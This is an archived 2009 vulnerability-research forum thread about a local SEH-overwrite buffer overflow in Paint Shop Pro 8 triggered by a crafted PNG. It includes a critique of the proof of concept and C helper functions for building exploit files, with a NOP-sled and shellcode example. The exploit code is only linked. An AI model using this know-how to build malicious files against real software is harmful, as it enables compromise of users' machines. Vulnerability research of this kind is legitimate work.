Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:13

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 11 posts ] 
Author Message
 Post subject: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 00:40 

Joined: 03 Feb 2009 01:40
Posts: 31
Software: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (UNIVERSAL)
Bug type: Local buffer overflow
Exploitation method: SEH handler overwrite
Description:
When a crafted .PNG file is oppened a stack buffer overflow occurs
because of DEP a SEH handler is overwriten and I overwriten his
address with a POP/POP/RET instruction from the gear12d.dll
module from the software.So the exploit is universal and has the
option to execute multiple shellcode's - 4 the most.
Testing: Tested succesfully on wINDOWS XP SP3,compiled with DevC++(.C file).
Author: All credits go to fl0 fl0w.
Video test : http://www.filehost.ro/639385/phtst_rar/
Code: http://cpp.pastebin.com/f30e1300f


Top
 Profile  
 
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 10:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
there are 2 things unclear.
the first is that PSP8 doesn't exist or no longer exists, the latest version of JASC/Corel is Paint Shop Pro Photo X2.
is it vulnerable?

then the proof-of-concept is not clear (or not optimized, don't know how to say it), indeed it's a PNG composed by 3 chunks: IHDR of 13 bytes, tIME of 7 and pHYs of 17417.
but inside the pHYs chunk there are pieces of other chunks/data like PLTE and IDAT which is completely senseless, so I guess you simply increased the size of pHYs but I don't understand why you left all that garbage there (in these cases the procedure is filling them with NOPs or 'A's or finding the real cause of the vulnerability) or why you didn't write a real proof-of-concept with the PNG file built at runtime.

that reminds me that thing you released for notepad++ which indeed didn't work not only for the PoC which was "speechless" (really I don't know how to define it, brrrrr) but moreover because the bug didn't exist at all :)
so in my opinion you should work a lot on the proof-of-concepts, not on the exploiting part (ret,nop,shellcode and so on) on which you don't seem to have problems but just on the format and the generation of the testing file.

hope it helps


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 14:35 

Joined: 03 Feb 2009 01:40
Posts: 31
Did u see the video ? I show how I execute code ..clear what more do u want.
At notepad++ I put some debugging info STACK OVERFLOW I don't know what are u talking about regarding the fact the "bug didn't exist".


Attachments:
testing.png
testing.png [ 18.04 KiB | Viewed 3238 times ]
Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 16:18 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I didn't talk about the code execution, I talked about the cleaning of the proof-of-concept and the real-time generation of the png file.
everything from 0x3c (ret+nop+shellcode excluded) is simply garbage so why you included it?
and if it's not gargage why don't you left only the data necessary for reaching the bugged function?
then where is the bug? is it in the size of the "pHYs" chunk which is too big?

png is a very simple file format (size+chunk+data+crc), that's why was better (I talk ever about the "beauty" of the code) to generate it at runtime and not having it pre-built, otherwise it's completely useless to write a C PoC for a pre-built file :)

oh and then remains the problem about the version of PSP, check here:
http://en.wikipedia.org/wiki/Corel_Pain ... nt_history
PSP 8 is a jurassic version of over 6 years ago

the notepad++ bug here it didn't work and indeed it has been not indexed on the security websites (those which check the vulnerabilities personally).
for example Secunia (which has lots of defects but at least they verify or seem to verify all the bugs they see) doesn't have that "bug" in the database.
maybe it was in a plugin of notepad++ or there was a particular condition that you had on your computer but doesn't exist "ever" on the others.
I have also verified the changelog of Notepad++ > 5.4.5 and there is no trace about a fix for a similar bug.
have you checked the changelog or the difference in the bugged and non-bugged source code to see if there were reference to the bug you saw?

that's what I meant :)


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 17:57 

Joined: 03 Feb 2009 01:40
Posts: 31
Notepad ++ I tested it on Vista too and it seemed to be DOS.. pff I don't know , it's posible for some module to have the bug, module on my computer .. regarding that PSP man I'm not as good as u at C so .. I didn't make a difference between prebuild and runtime .


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 19:10 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
no problem, it can be a good occasion to make practice and learning it.
indeed if you have full power in the building of a file format (or a protocol which is exactly the same thing in programming) you can find more vulnerabilities, easier and moreover knowing perfectly where is located a bug in case of doubts.

the only requirements are:
- a documentation of the format reporting all its fields, so endianes of the numeric fields which can be of 8, 16, 32 or even 64 bits, string fields, data fields (numeric fields which specify the size followed by the data), bitstrings or bit fields, compressions and so on
- the usage of functions which help in this job

the second point is very important because building a file format using structures or memcpy/fwrite for each field is a pain and terribly confusing for both the author and who reads the code.
personally I like a lot to use functions that do this job and handle even the endianess, maybe you have noticed them in my PoCs.
the following is a partial list of those for doing operations with a memory buffer and a pointer automatically incremented:
Code:
// useful for filling memory with NOPs, 'A's, zeroes and so on
int putcc(unsigned char *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}

// for copying data from a buffer to the one on which we are working
int putmm(unsigned char *data, unsigned char *str, int len) {
    memcpy(data, str, len);
    return(len);
}

// for copying a string
int putss(unsigned char *data, unsigned char *str) {
    int     len;

    len = strlen(str);
    memcpy(data, str, len);
    return(len);
}

// for storing a number of 8, 16 or 32 bits in little endian
int putxx(unsigned char *data, unsigned int num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3));
    }
    return(bytes);
}


example:
    int     buff_size;
    char    *p;
    char    buff[4000];

    p = buff;
    p += putxx(p, 123,      8);
    p += putxx(p, 1234,     16);
    p += putxx(p, 12345678, 32);
    p += putss(p, "I'm a string");
    p += putcc(p, 0x90,     100);
    p += putmm(p, shellcode, sizeof(shellcode));
    buff_size = p - buff;
I hope it helps or helps someone else interested to these things


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 04 Dec 2009 19:45 

Joined: 03 Feb 2009 01:40
Posts: 31
Good point functions u use are important otherwhise u get really confused in the process of making the file ..I see the code is really good thinking , thanks.Btw is there any way we could chat somewhere else I have a lot of bugs, or I just keep trying stuff and I get errors ,crashes, sometimes exploitable , anyways I experiment a lot that I don't fully understand ,and I'm just analyzing other codes for hours a time , ur code just now after some time I'm starting to understand some things but I'd say 40%-50%.I won't bug u or stuff like that just talk u know..I'd like to become as skilled some day, and it needs work.


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 05 Dec 2009 00:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
you can find my msn contact in the profile, it's the only type of chat I use although rarely.
and yeah, this hobby requires time and effort, but sometimes it deserves what we spend in it :)
it introduces new things which obligate us to learn something new and then we see that what we learnt can be used also to do other things, maybe completely different, and learning new stuff again just like a chain.


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 05 Dec 2009 00:42 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
oh, and in case you want to test the latest PSP which is PSP12 aka "Paint Shop Pro Photo X2" the following is the official link of the trial:
http://www.corel.com/akdlm/6763/downloads/trials/PaintShopProX2/Ultimate/PSPP12_Corel_TBYB_EN_IE_FR_DE_ES_IT_NL_ESD.exe
I don't know if it's still vulnerable because I have not tested it but there are good chances it's still bugged after 6 years


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 05 Dec 2009 19:23 

Joined: 03 Feb 2009 01:40
Posts: 31
Btw ur functions return a integer so how can u add with a char parameter ?


Top
 Profile  
 
 Post subject: Re: Jasc Paint Shop Pro v8 Local Buffer Overflow Exploit (Univer
PostPosted: 05 Dec 2009 19:57 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
because it's a char pointer so I increment its current position with the integer returned by the functions.
so if my p pointer points to the memory address 0x00401000 when I do "p += putxx(p, 0x11223344, 32);" I will add 4 (because a 32bit number occupied 4 bytes) to it and so it will point to 0x00401004.

if instead of being a char point it was an int pointer it would be incremented of 16 bytes, 4 (size of an int) * 4 (number returned by the function, but that's another story


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 11 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: